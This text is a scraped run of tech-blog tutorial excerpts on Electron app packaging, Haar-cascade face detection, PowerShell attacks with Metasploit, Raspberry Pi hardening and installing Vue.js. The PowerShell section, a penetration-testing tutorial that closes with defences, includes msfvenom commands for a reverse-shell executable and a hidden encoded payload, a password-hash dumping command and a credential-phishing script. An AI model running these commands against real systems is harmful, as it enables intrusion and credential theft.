    loading: state.loadingRegions
});

const getDispatch = (dispatch: any) => ({
    saveRegions: () => dispatch(saveRegionsToDisk())
});

export const ConnectedRegionsTable = connect(
    getProps,
    getDispatch
)(RegionsTable);

How it works

The code we added showed how we could gain access to a Node package (fs, in our case) and some extra functions, such as showing a Save to disk dialog. When we run our updated app and select a country, we'll see our newly added button. Clicking on the button will pop up a dialog, allowing you to select the destination for the data. If you click Save, the list of regions will be written in JSON format, as we specified earlier in our saveRegionsToDisk() function.

Building a more windowy experience

In the previous recipe, we added the possibility of using any and all of the functions provided by Node. In this recipe, let's now focus on making our app more window-like, with icons, menus, and so on. We want the user to really believe that they're using a native app, with all the features that they would be accustomed to. The following list of interesting modules from the Electron APIs is just a short list of highlights, but there are many more available options:

- clipboard: to do copy and paste operations using the system's clipboard
- dialog: to show the native system dialogs for messages, alerts, opening and saving files, and so on
- globalShortcut: to detect keyboard shortcuts
- Menu, MenuItem: to create a menu bar with menus and submenus
- Notification: to add desktop notifications
- powerMonitor, powerSaveBlocker: to monitor power state changes, and to disable entering sleep mode
- screen: to get information about the screen, displays, and so on
- Tray: to add icons and context menus to the system's tray

Let's add a few of these functions so that we can get a better-looking app that is more integrated with the desktop.
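Before we do, here is a quick taste of how lightweight these modules are to call. This is a hypothetical main-process sketch (not part of the book's recipe) touching two of the APIs from the list above:

// Minimal sketch, main-process code
const { clipboard, Notification } = require("electron");

// clipboard: copy a string to the system clipboard
clipboard.writeText("Regions copied!");

// Notification: show a native desktop notification
new Notification({
  title: "Regions app",
  body: "Data was copied to the clipboard"
}).show();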
How to do it

Any decent app should probably have at least an icon and a menu, possibly with some keyboard shortcuts, so let's add those features now, and just for the sake of it, let's also add some notifications for when regions are written to disk. Together with the Save dialog we already used, this means that our app will include several native windowing features.

To start with, let's add an icon. Showing an icon is the simplest thing, because it just requires an extra option when creating the BrowserWindow() object. I'm not very graphics-visual-designer oriented, so I just downloaded the Alphabet, letter, r Icon Free file from the Icon-Icons website. Implement the icon as follows:

mainWindow = new BrowserWindow({
    height: 768,
    width: 1024,
    icon: "./src/regionsApp/r_icon.png"
});

You can also choose icons for the system tray, although there's no way of using our regions app in that context, but you may want to look into it nonetheless.

To continue, the second feature we'll add is a menu, with some global shortcuts to boot. In our App.regions.js file, we'll need to add a few lines to access the Menu module, and to define our menu itself:

// Source file: src/App.regions.js
. . .
import { getRegions } from "./regionsApp/world.actions";
. . .
const electron = window.require("electron").remote;
const { Menu } = electron;

const template = [
    {
        label: "Countries",
        submenu: [
            {
                label: "Uruguay",
                accelerator: "Alt+CommandOrControl+U",
                click: () => store.dispatch(getRegions("UY"))
            },
            {
                label: "Hungary",
                accelerator: "Alt+CommandOrControl+H",
                click: () => store.dispatch(getRegions("HU"))
            }
        ]
    },
    {
        label: "Bye!",
        role: "quit"
    }
];

const mainMenu = Menu.buildFromTemplate(template);
Menu.setApplicationMenu(mainMenu);

Using a template is a simple way to create a menu, but you can also do it manually, adding item by item. I decided to have a Countries menu with two options to show the regions for Uruguay and Hungary. The click property dispatches the appropriate action. I also used the accelerator property to define global shortcuts. See accelerator.md in the Electron documentation for the list of possible key combinations to use, including the following:

- Command keys, such as Command (or Cmd), Control (or Ctrl), or both (CommandOrControl or CmdOrCtrl)
- Alternate keys, such as Alt, AltGr, or Option
- Common keys, such as Shift, Escape (or Esc), Tab, Backspace, Insert, or Delete
- Function keys, such as F1 to F24
- Cursor keys, including Up, Down, Left, Right, Home, End, PageUp, and PageDown
- Media keys, such as MediaPlayPause, MediaStop, MediaNextTrack, MediaPreviousTrack, VolumeUp, VolumeDown, and VolumeMute

I also want to be able to quit the application. A complete list of roles is available in the Electron docs. With these roles, you can do a huge amount, including some specific macOS functions, along with the following:

- Work with the clipboard (cut, copy, paste, and pasteAndMatchStyle)
- Handle the window (minimize, close, quit, reload, and forceReload)
- Zoom (zoomIn, zoomOut, and resetZoom)

To finish, and really just for the sake of it, let's add a notification trigger for when a file is written. Electron has a Notification module, but I opted to use node-notifier, which is quite simple to use. First, we'll add the package in the usual fashion:

npm install node-notifier --save

In serviceApi.js, we'll have to export the new function, so we'll be able to import it elsewhere, as we'll see shortly:

const electron = window.require("electron").remote;
. . .
export const notifier = electron.require("node-notifier");

Finally, let's use this in our world.actions.js file:

import { notifier, . . . } from "./serviceApi";

With all our setup, actually sending a notification is quite simple, requiring very little code:

// Source file: src/regionsApp/world.actions.js
. . .
export const saveRegionsToDisk = () => async (
    dispatch: ({}) => any,
    getState: () => { regions: [] }
) => {
    showSaveDialog((filename: string = "") => {
        if (filename) {
            writeFile(filename, JSON.stringify(getState().regions), e => {
                if (e) {
                    window.console.log(`ERROR SAVING ${filename}`, e);
                } else {
                    notifier.notify({
                        title: "Regions app",
                        message: `Regions saved to ${filename}`
                    });
                }
            });
        }
    });
};

How it works

First, we can easily check that the icon appears. Now, let's look at the menu. It has our options, including the shortcuts. Then, if we select an option with either the mouse or the global shortcut, the screen correctly loads the expected regions. Finally, let's see if the notifications work as expected. If we click on the Save regions to disk button and select a file, we'll see a notification, as in the following screenshot:

Making a distributable package

Now that we have a full app, all that's left to do is package it up so that you can deliver it as an executable file for Windows, Linux, or macOS users.

How to do it

There are many ways of packaging an app, but we'll use a tool, electron-builder, that will make it even easier, if you can get its configuration right! First of all, we'll have to begin by defining the build configuration, and our initial step will be, as always, to install the tool:

npm install electron-builder --save-dev

To access the added tool, we'll require a new script, which we'll add in package.json:

"scripts": {
    "dist": "electron-builder",
    . . .
}

We'll also have to add a few more details to package.json, which are needed for the build process and the produced app. In particular, the homepage change is required, because the CRA-created index.html file uses absolute paths that won't work later with Electron:

"name": "chapter13",
"version": "0.1.0",
"description": "Regions app for chapter 13",
"homepage": "./",
"license": "free",
"author": "Federico Kereki",

Finally, some specific building configuration will be required. You cannot build for macOS with a Linux or Windows machine, so I'll leave that configuration out. We have to specify where the files will be found, what compression method to use, and so on:

"build": {
    "appId": "com.electron.chapter13",
    "compression": "normal",
    "asar": true,
    "extends": null,
    "files": [
        "electron-start.js",
        "build/**/*",
        "node_modules/**/*",
        "src/regionsApp/r_icon.png"
    ],
    "linux": {
        "target": "zip"
    },
    "win": {
        "target": "portable"
    }
}

We have completed the required configuration, but there are also some changes to make in the code itself, and we'll have to adapt the code for building the package. When the packaged app runs, there won't be any webpack server running; the code will be taken from the built React package.
The starter code will require the following changes:

// Source file: electron-start.for.builder.js
/* @flow */
const { app, BrowserWindow } = require("electron");
const path = require("path");
const url = require("url");

let mainWindow;

const createWindow = () => {
  mainWindow = new BrowserWindow({
    height: 768,
    width: 1024,
    icon: path.join(__dirname, "./build/r_icon.png")
  });

  mainWindow.loadURL(
    url.format({
      pathname: path.join(__dirname, "./build/index.html"),
      protocol: "file",
      slashes: true
    })
  );

  mainWindow.on("closed", () => {
    mainWindow = null;
  });
};

app.on("ready", createWindow);
app.on("activate", () => mainWindow === null && createWindow());
app.on(
  "window-all-closed",
  () => process.platform !== "darwin" && app.quit()
);

Mainly, we are taking icons and code from the build/ directory. An npm run build command will take care of generating that directory, so we can proceed with creating our executable app.

How it works

After doing this setup, building the app is essentially trivial. Just run the dist script we defined earlier, and all the distributable files will be found in the dist/ directory:

npm run dist

Now that we have the Linux app, we can run it by unzipping the .zip file and clicking on the chapter13 executable. (The name came from the "name" attribute in package.json, which we modified earlier.) The result should be like what's shown in the following screenshot.

I also wanted to try out the Windows EXE file. Since I didn't have a Windows machine, I made do by downloading a free VirtualBox virtual machine. After downloading the virtual machine, setting it up in VirtualBox, and finally running it, the result that was produced was the same as for Linux.

So, we've managed to develop a React app, enhanced it with Node and Electron features, and finally packaged it for different operating systems. With that, we are done!

If you found this post useful, do check out the book Modern JavaScript Web Development Cookbook. You will learn how to create native mobile applications for Android and iOS with React Native, build client-side web applications using React and Redux, and much more.

How to perform event handling in React [Tutorial]
Flutter challenges Electron, soon to release a desktop client to accelerate mobile development
Electron 3.0.0 releases with experimental textfield, and button APIs

Implementing face detection using the Haar Cascades and AdaBoost algorithm

Sugandha Lahoti
20 Feb 2018
7 min read
This article is an excerpt from a book written by Ankit Dixit titled Ensemble Machine Learning. This book serves as an effective guide to using ensemble techniques to enhance machine learning models.

In today's tutorial, we will learn how to apply the AdaBoost classifier in face detection using Haar cascades.

Face detection using Haar cascades

Object detection using Haar feature-based cascade classifiers is an effective object detection method proposed by Paul Viola and Michael Jones in their paper Rapid Object Detection using a Boosted Cascade of Simple Features in 2001. It is a machine-learning-based approach where a cascade function is trained from a lot of positive and negative images. It is then used to detect objects in other images. Here, we will work with face detection. Initially, the algorithm needs a lot of positive images (images of faces) and negative images (images without faces) to train the classifier. Then we need to extract features from them.

Features are nothing but numerical information extracted from the images that can be used to distinguish one image from another; for example, a histogram (the distribution of intensity values) is one feature that can be used to define several characteristics of an image even without looking at it, such as whether the image is dark or bright, its intensity range, its contrast, and so on.

We will use Haar features to detect faces in an image. Here is a figure showing the different Haar features:

These features are just like convolution kernels; to learn more about convolution, you will need to wait for the following chapters. For a basic understanding, convolution can be described as in the following figure, and summarized with these steps:

1. Pick a pixel location in the image.
2. Crop a sub-image, with the selected pixel as its center, from the source image, with the same size as the convolution kernel.
3. Calculate an element-wise product between the values of the kernel and the sub-image.
4. Add up the results of the products.
5. Put the resultant value into the new image at the same place where you picked the pixel location.

Now we are going to follow a similar kind of procedure, but with a slight difference for our images. Each of our features is a single value obtained by subtracting the sum of the pixels under the white rectangle from the sum of the pixels under the black rectangle. Now, all possible sizes and locations of each kernel are used to calculate plenty of features. (Just imagine how much computation it needs; even a 24x24 window results in over 160,000 features.) For each feature calculation, we need to find the sum of the pixels under the white and black rectangles. To solve this, we will use the concept of the integral image; we will discuss this concept only briefly here, as it's not part of our main context.

Integral image

Integral images are images in which the pixel value at any (x, y) location is the sum of all the pixel values present before the current pixel. Its use can be understood from the following example:

Image on the left and the integral image on the right.

Let's see how this concept can help reduce computation time; let us assume a matrix A of size 5x5 representing an image, as shown here:

Now, let's say we want to calculate the average intensity over the highlighted area:

Region for addition

Normally, you'd do the following:

9 + 1 + 2 + 6 + 0 + 5 + 3 + 6 + 5 = 37
37 / 9 = 4.11

This requires a total of 9 operations.
Doing the same for 100 such operations would require 100 * 9 = 900 operations. Now, let us first make an integral image of the preceding image:

Making this image requires a total of 56 operations. Again, focus on the highlighted portion. To calculate the average intensity, all you have to do is:

(76 - 20) - (24 - 5) = 37
37 / 9 = 4.11

This requires a total of 4 operations. To do this for 100 such operations, we would require 56 + 100 * 4 = 456 operations. For just a hundred operations over a 5x5 matrix, using an integral image requires about 50% fewer computations. Imagine the difference it makes for large images and other such operations. Creating an integral image reduces subsequent sum and difference operations to almost O(1) time complexity, thereby decreasing the number of calculations. It simplifies the calculation of the sum of pixels, no matter how large the number of pixels, to an operation involving just four pixels. Nice, isn't it? It makes things superfast.

However, among all of these features we calculated, most are irrelevant. For example, consider the following image. The top row shows two good features. The first feature selected seems to focus on the property that the region of the eyes is often darker than the region of the nose and cheeks. The second feature selected relies on the property that the eyes are darker than the bridge of the nose. But the same windows applied to the cheeks or any other part are irrelevant.

So how do we select the best features out of 160,000+ features? This is achieved by AdaBoost. To do this, we apply each and every feature to all the training images. For each feature, we find the best threshold that will classify the faces as positive and negative. Obviously, there will be errors or misclassifications. We select the features with the minimum error rate, which means they are the features that best separate the face and non-face images.

Note: The process is not as simple as this. Each image is given an equal weight in the beginning. After each classification, the weights of misclassified images are increased. Then the same process is repeated, and new error rates are calculated with the new weights. This process continues until the required accuracy or error rate is achieved, or the required number of features is found.

The final classifier is a weighted sum of these weak classifiers. They are called weak because each alone can't classify the image, but together with the others, they form a strong classifier. The paper says that even 200 features provide detection with 95% accuracy. The authors' final setup had around 6,000 features. (Imagine a reduction from 160,000+ to 6,000 features. That is a big gain.)

Face detection framework using the Haar cascade and AdaBoost algorithm

So now, you take an image, take each 24x24 window, apply 6,000 features to it, and check if it is a face or not. Wow! Wow! Isn't this a little inefficient and time consuming? Yes, it is. The authors of the algorithm have a good solution for that. In an image, most of the image region is non-face, so it is a better idea to have a simple method to verify that a window is not a face region. If it is not, discard it in a single shot and don't process it again; instead, focus on the regions where there can be a face. This way, we have more time to check the possible face regions. For this, they introduced the concept of a cascade of classifiers, which we'll come back to after a quick code detour.
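First, the integral-image trick is easy to verify in a few lines of NumPy. This sketch (with made-up values) is not from the book, but it confirms the four-lookup arithmetic described above:

import numpy as np

# A hypothetical 5x5 image; any values work for the demonstration
A = np.random.randint(0, 10, size=(5, 5))

# Integral image: entry (i, j) holds the sum of all pixels above and to the left, inclusive
I = A.cumsum(axis=0).cumsum(axis=1)

def region_sum(I, r1, c1, r2, c2):
    # Sum of A[r1:r2+1, c1:c2+1] using at most four lookups in the integral image
    total = I[r2, c2]
    if r1 > 0:
        total -= I[r1 - 1, c2]
    if c1 > 0:
        total -= I[r2, c1 - 1]
    if r1 > 0 and c1 > 0:
        total += I[r1 - 1, c1 - 1]
    return total

# The four-lookup sum matches the naive sum over the region
assert region_sum(I, 1, 1, 3, 3) == A[1:4, 1:4].sum()

With that verified, let's return to the cascade.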
Instead of applying all 6,000 features to a window, we group the features into different stages of classifiers and apply them one by one (normally, the first few stages will contain very few features). If a window fails at the first stage, discard it; we don't consider the remaining features on it. If it passes, apply the second stage of features and continue the process. A window that passes all stages is a face region. How cool is the plan!!!

The authors' detector had 6,000+ features spread over 38 stages, with 1, 10, 25, 25, and 50 features in the first five stages (the two features in the preceding image were actually obtained as the best two features from AdaBoost). According to the authors, on average, 10 features out of the 6,000+ are evaluated per subwindow.

So this is a simple, intuitive explanation of how Viola-Jones face detection works. Read the paper for more details. If you found this post useful, do check out the book Ensemble Machine Learning to learn about different machine learning aspects such as bagging, boosting, and stacking.

Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

Savia Lobo
04 Nov 2018
4 min read
PowerShell is a perfect tool for performing sophisticated attacks, and it can also be used side by side with the Metasploit Framework. This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.

In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.

Interactive PowerShell

PowerShell attacks are already integrated into Metasploit. You can check this by using the search command:

msf> search powershell

Now it is time to learn how to use Metasploit with PowerShell. As a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:

msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe

msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [PowerShell script here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe

PowerSploit

PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit

After cloning the project, use the ls command to list the files. From the listing, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:

- AntivirusBypass
- Exfiltration
- Persistence
- PowerSploit
- PowerUp
- PowerView

Nishang – PowerShell for penetration testing

Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang

As you can see from listing the downloaded project, Nishang is loaded with many scripts and utilities for performing a lot of the tasks required during penetration testing missions, such as:

- Privilege escalation
- Scanning
- Pivoting

You can explore all the available scripts by listing the contents of the Nishang project using the ls command.

Let's explore the power of some of Nishang's scripts on a Windows machine. You can import all the modules using the Import-Module PowerShell cmdlet. Oops, something went wrong! Don't worry: in order to use Import-Module, you need to open PowerShell as an administrator and type:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

Then you can import the modules. Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information. If you want to unveil WLAN keys, type Get-WLAN-Keys.

You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. However, if you want to pop the command after getting a shell, use:

powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"

You can even perform a phishing attack using Invoke-CredentialsPhish, as in the previous demonstration.
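A minimal sketch of that invocation follows. The path below is hypothetical (point it at your own clone of the Nishang repository), and double-check the script name against your copy, since releases have shipped it as Invoke-CredentialsPhish.ps1:

# Hypothetical path: adjust to wherever you cloned Nishang
Import-Module 'C:\tools\nishang\Gather\Invoke-CredentialsPhish.ps1'

# Shows the logged-on user a credential prompt and prints what they enter
Invoke-CredentialsPhish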
You can run this attack on the victim's machine, as shown here:

Defending against PowerShell attacks

In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

- Run the latest PowerShell version (version 5, when this book was written). To check, type Get-Host.
- Monitor PowerShell logs.
- Enforce a least-privilege policy and appropriate group policy settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker.
- Use the Constrained Language mode:

PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

To check the Constrained Language mode, type:

$ExecutionContext.SessionState.LanguageMode

That way, malicious scripts won't work.

Thus, in this article, we saw how combining Metasploit and PowerShell lets us perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANs and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.

Pentest tool in focus: Metasploit
Approaching a Penetration Test Using Metasploit
Getting Started with Metasploitable2 and Kali Linux

How to secure your Raspberry Pi board [Tutorial]

Gebin George
13 Jul 2018
10 min read
In this Raspberry Pi tutorial, we will learn to secure our Raspberry Pi board. We will also learn to implement and enable the security features that make the Pi secure. This article is an excerpt from the book, Internet of Things with Raspberry Pi 3, written by Maneesh Rao.

Changing the default password

Every Raspberry Pi that is running the Raspbian operating system has the default username pi and default password raspberry, which should be changed as soon as we boot up the Pi for the first time. If our Raspberry Pi is exposed to the internet and the default username and password have not been changed, then it becomes an easy target for hackers.

To change the password of the Pi in case you are using the GUI for logging in, open the menu and go to Preferences and Raspberry Pi Configuration, as shown in Figure 10.1. Within Raspberry Pi Configuration, under the System tab, select the Change Password option, which will prompt you to provide a new password. After that, click on OK and the password is changed (refer to Figure 10.2).

If you are logging in through PuTTY using SSH, then open the configuration settings by running the sudo raspi-config command, as shown in Figure 10.3. On successful execution of the command, the configuration window opens up. Select the second option to change the password, and then finish, as shown in Figure 10.4. It will prompt you to provide a new password; you just need to provide it and exit. The new password is then set (refer to Figure 10.5).

Changing the username

All Raspberry Pis come with the default username pi, which should be changed to make the Pi more secure. We create a new user, assign it all the necessary rights, and then delete the pi user. To add a new user, run the sudo adduser adminuser command in the terminal. It will prompt for a password; provide it, and you are done, as shown in Figure 10.6.

Now, we will add our newly created user to the sudo group so that it has all the root-level permissions, as shown in Figure 10.7. Now, we can delete the default user, pi, by running the sudo deluser pi command. This will delete the user, but its home folder, /home/pi, will still be there. If required, you can delete that as well.

Making sudo require a password

When a command is run with sudo as the prefix, it executes with superuser privileges. By default, running a command with sudo doesn't need a password, but this can cost you dearly if a hacker gets access to the Raspberry Pi and takes control of everything. To make sure that a password is required every time a command is run with superuser privileges, edit the 010_pi-nopasswd file under /etc/sudoers.d/ by executing the command shown in Figure 10.8. This command will open up the file in the nano editor; replace its content with pi ALL=(ALL) PASSWD: ALL, and save it.

Updating the Raspbian operating system

To get the latest security updates, it is important to ensure that the Raspbian OS is updated to the latest version whenever available. Visit https://www.raspberrypi.org/documentation/raspbian/updating.md to learn the steps to update Raspbian.

Improving SSH security

SSH is one of the most common techniques used to access Raspberry Pi over the network, and securing it becomes necessary if you want to make the Pi secure.

Username and password security

Apart from having a strong password, we can allow and deny access to specific users. This can be done by making changes in the sshd_config file. Run the sudo nano /etc/ssh/sshd_config command.
This will open up the sshd_config file; then, add the following line(s) at the end to allow or deny specific users:

To allow users, add the line:

AllowUsers tom john merry

To deny users, add this line:

DenyUsers peter methew

For these changes to take effect, it is necessary to reboot the Raspberry Pi.

Key-based authentication

By using a public-private key pair to authenticate a client to an SSH server (the Raspberry Pi), we can secure our Raspberry Pi from hackers. To enable key-based authentication, we first need to generate a public-private key pair using a tool called PuTTYgen on Windows, or ssh-keygen on Linux. Note that the key pair should be generated by the client, not by the Raspberry Pi. For our purpose, we will use PuTTYgen to generate the key pair. Download PuTTY from the following web link. Note that PuTTYgen comes with PuTTY, so you need not install it separately.

Open the PuTTYgen client and click on Generate, as shown in Figure 10.9. Next, hover the mouse over the blank area to generate the key, as highlighted in Figure 10.10. Once the key generation process is complete, there will be an option to save the public and private keys separately for later use, as shown in Figure 10.11; ensure you keep your private key safe and secure.

Let's name the public key file rpi_pubkey and the private key file rpi_privkey.ppk, and transfer the public key file rpi_pubkey from our system to the Raspberry Pi. Log in to the Raspberry Pi and, under the user's home directory, which is /home/pi in our case, create a special directory with the name .ssh, as shown in Figure 10.12. Now, move into the .ssh directory using the cd command and create/open a file with the name authorized_keys, as shown in Figure 10.13. The nano command opens up the authorized_keys file, into which we will copy the content of our public key file, rpi_pubkey. Then, save (Ctrl + O) and close the file (Ctrl + X).

Now, provide the required permissions for your pi user to access the files and folders. Run the following commands to set the permissions:

chmod 700 ~/.ssh/ (set permissions for the .ssh directory)
chmod 600 ~/.ssh/authorized_keys (set permissions for the key file)

Refer to Figure 10.14, which shows the permissions before and after running the chmod commands.

Finally, we need to disable password logins to avoid unauthorized access, by editing the /etc/ssh/sshd_config file. Open the file in the nano editor by running the following command:

sudo nano /etc/ssh/sshd_config

In the file, there is a parameter #PasswordAuthentication yes. We need to uncomment the line by removing # and set the value to no:

PasswordAuthentication no

Save (Ctrl + O) and close the file (Ctrl + X). Now, password login is prohibited and we can access the Raspberry Pi using the key file only. Restart the Raspberry Pi to make sure all the changes take effect, with the following command:

sudo reboot

Here, we are assuming that the system used to generate the key pair is the same one that will be used to log in to the Pi. Now, you can log in to the Raspberry Pi using PuTTY. Open the PuTTY terminal and provide the IP address of your Pi. On the left-hand side of the PuTTY window, under Category, expand SSH, as shown in Figure 10.15. Then, select Auth, which will provide the option to browse and upload the private key file, as shown in Figure 10.16. Once the private key file is uploaded, click on Open and it will log in to the Raspberry Pi successfully, without any password.
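If your client machine runs Linux or macOS rather than Windows, the same key-based setup can be done without PuTTYgen. This is a minimal sketch; the IP address 192.168.1.10 is hypothetical, so substitute your Pi's actual address:

# Generate a key pair on the client (accept the default file locations)
ssh-keygen -t rsa -b 4096

# Copy the public key into ~/.ssh/authorized_keys on the Pi in one step
ssh-copy-id pi@192.168.1.10

# From now on, this logs in with the key instead of a password
ssh pi@192.168.1.10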
Setting up a firewall

There are many firewall solutions available for Linux/Unix-based operating systems, such as Raspbian OS in the case of the Raspberry Pi. These firewall solutions use IP tables underneath to filter packets coming from different sources and allow only the legitimate ones to enter the system. IP tables are installed on the Raspberry Pi by default, but are not set up, and setting up the default IP table is a bit tedious. So, we will use an alternative tool, Uncomplicated Firewall (UFW), which is extremely easy to set up and use.

To install ufw, run the following command (refer to Figure 10.17):

sudo apt install ufw

Once the download is complete, enable ufw (refer to Figure 10.18) with the following command:

sudo ufw enable

If you want to disable the firewall (refer to Figure 10.20), use the following command:

sudo ufw disable

Now, let's see some features of ufw that we can use to improve the safety of the Raspberry Pi. Allow traffic only on a particular port using the allow command, as shown in Figure 10.21. Restrict access on a port using the deny command, as shown in Figure 10.22. We can also allow and restrict access for a specific service on a specific port; here, we allow tcp traffic on port 21 (refer to Figure 10.23). We can check the status of all the rules under the firewall using the status command, as shown in Figure 10.24. We can also restrict access for particular IP addresses on a particular port; here, we deny access to port 30 from the IP address 192.168.2.1, as shown in Figure 10.25. To learn more about ufw, visit https://www.linux.com/learn/introduction-uncomplicated-firewall-ufw.

Fail2Ban

At times, we use our Raspberry Pi as a server that interacts with other devices, which act as clients for the Raspberry Pi. In such scenarios, we need to open certain ports and allow certain IP addresses to access them. These access points can become entry points for hackers to get hold of the Raspberry Pi and do damage. To protect ourselves from this threat, we can use the Fail2Ban tool. This tool monitors the logs of Raspberry Pi traffic, keeps a check on brute-force attempts and DDoS attacks, and informs the installed firewall to block requests from the offending IP address. To install Fail2Ban, run the following command:

sudo apt install fail2ban

Once the download completes successfully, a folder with the name fail2ban is created at the path /etc. Under this folder, there is a file named jail.conf. Copy the content of this file to a new file named jail.local; this enables Fail2Ban on the Raspberry Pi. To copy, you can use the following command:

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Now, edit the file using the nano editor:

sudo nano /etc/fail2ban/jail.local

Look for the [ssh] section. It has a default configuration, as shown in Figure 10.26. This shows that Fail2Ban is enabled for ssh. It checks the port for ssh connections, filters the traffic as per the conditions set in the sshd filter file located at /etc/fail2ban/filter.d/sshd.conf, parses the logs at /var/log/auth.log for any suspicious activity, and allows only six retries for login, after which it blocks that particular IP address. The default action taken by Fail2Ban in case someone tries to hack is defined in jail.local, as shown in Figure 10.27. This means that when the iptables-multiport action is taken against any malicious activity, it runs as per the configuration in /etc/fail2ban/action.d/iptables-multiport.conf.

To summarize, we learned how to secure our Raspberry Pi single-board computer.
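As a quick reference, the ufw rules discussed above are shown only in Figures 10.21 to 10.25, so here is an illustrative sketch of the corresponding commands; the ports in the first two rules (22 and 23) are our own example choices, while port 21, port 30, and the IP address come from the text:

sudo ufw allow 22                               # allow traffic on a particular port (22 is an example)
sudo ufw deny 23                                # restrict access on a port (23 is an example)
sudo ufw allow 21/tcp                           # allow only tcp traffic on port 21
sudo ufw status                                 # check the status of all the rules
sudo ufw deny from 192.168.2.1 to any port 30   # deny access to port 30 from 192.168.2.1

Likewise, the default [ssh] jail shown in Figure 10.26 typically looks something like the following in jail.local. This is a sketch based on the older Fail2Ban releases that match the description above; newer versions name the jail [sshd] and their defaults may differ:

[ssh]
enabled  = true
port     = ssh
filter   = sshd
logpath  = /var/log/auth.log
maxretry = 6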
If you found this post useful, do check out the book Internet of Things with Raspberry Pi 3, to interface various sensors and actuators with Raspberry Pi 3 and send data to the cloud.

Build an Actuator app for controlling Illumination with Raspberry Pi 3
Should you go with Arduino Uno or Raspberry Pi 3 for your next IoT project?
Build your first Raspberry Pi project
Installing and Using Vue.js

Packt
10 Jan 2017
14 min read
In this article by Olga Filipova, the author of the book Learning Vue.js 2, we explore the key concepts of the Vue.js framework to understand what goes on behind the scenes. We will also analyze all the possible ways of installing Vue.js, and learn the ways of debugging and testing our applications.

So, in this article we are going to learn:

What the MVVM architectural paradigm is and how it applies to Vue.js
How to install, start, run, and debug a Vue application

MVVM architectural pattern

Do you remember how to create the Vue instance? We were instantiating it by calling new Vue({…}). You also remember that in the options we were passing the element on the page where this Vue instance should be bound, and the data object that contained the properties we wanted to bind to our view. The data object is our model, and the DOM element where the Vue instance is bound is the view (classic View-Model representation, where the Vue instance binds one to the other). In the meantime, our Vue instance is what helps to bind our model to the view and vice versa. Our application thus follows the Model-View-ViewModel (MVVM) pattern, where the Vue instance is a ViewModel.

Our Model contains data and some business logic, and our View is responsible for its representation. The ViewModel handles data binding, ensuring that data changed in the Model immediately affects the View layer and vice versa. Our Views thus become completely data-driven. The ViewModel becomes responsible for the control of data flow, making data binding fully declarative for us.

Installing, using, and debugging a Vue.js application

In this section, we will analyze all the possible ways of installing Vue.js. We will also create a skeleton for our application, and learn the ways of debugging and testing our applications.

Installing Vue.js

There are a number of ways to install Vue.js, from the classic approach of including the downloaded script in HTML within <script> tags, to using tools like bower, npm, or Vue's command-line interface (vue-cli) to bootstrap the whole application. Let's have a look at all these methods and choose our favorite. In all these examples we will just show a header on a page saying Learning Vue.js.

Standalone

Download the vue.js file. There are two versions, minified and development. The development version is here: https://vuejs.org/js/vue.js. The minified version is here: https://vuejs.org/js/vue.min.js. If you are developing, make sure you use the development, non-minified version of Vue. You will love the nice tips and warnings on the console. Then just include vue.js in the script tags:

<script src="vue.js"></script>

Vue is registered in the global variable. You are ready to use it. Our example will then look as simple as the following:

<div id="app">
  <h1>{{ message }}</h1>
</div>
<script src="vue.js"></script>
<script>
  var data = { message: "Learning Vue.js" };
  new Vue({ el: "#app", data: data });
</script>

CDN

Vue.js is available on the following CDNs:

jsdelivr: https://cdn.jsdelivr.net/vue/1.0.25/vue.min.js
cdnjs: https://cdnjs.cloudflare.com/ajax/libs/vue/1.0.25/vue.min.js
npmcdn: https://npmcdn.com/vue@1.0.25/dist/vue.min.js

Just put the URL in the source in the script tag and you are ready to use Vue!

<script src="https://cdnjs.cloudflare.com/ajax/libs/vue/1.0.25/vue.min.js"></script>

Be aware, though, that the CDN version might not be synchronized with the latest available version of Vue.
Thus, the example will look exactly the same as in the standalone version, but instead of using the downloaded file in the <script> tags, we are using a CDN URL.

Bower

If you are already managing your application with bower and don't want to use other tools, there's also a bower distribution of Vue. Just call bower install:

# latest stable release
bower install vue

Our example will look exactly like the two previous examples, but it will include the file from the bower folder:

<script src="bower_components/vue/dist/vue.js"></script>

CSP-compliant

CSP (Content Security Policy) is a security standard that provides a set of rules that must be obeyed by the application in order to prevent security attacks. If you are developing applications for browsers, you most likely know this policy pretty well! For environments that require CSP-compliant scripts, there's a special version of Vue.js here: https://github.com/vuejs/vue/tree/csp/dist

Let's do our example as a Chrome application to see the CSP-compliant vue.js in action! Start by creating a folder for our application example. The most important thing in a Chrome application is the manifest.json file, which describes your application. Let's create it. It should look like the following:

{
  "manifest_version": 2,
  "name": "Learning Vue.js",
  "version": "1.0",
  "minimum_chrome_version": "23",
  "icons": {
    "16": "icon_16.png",
    "128": "icon_128.png"
  },
  "app": {
    "background": {
      "scripts": ["main.js"]
    }
  }
}

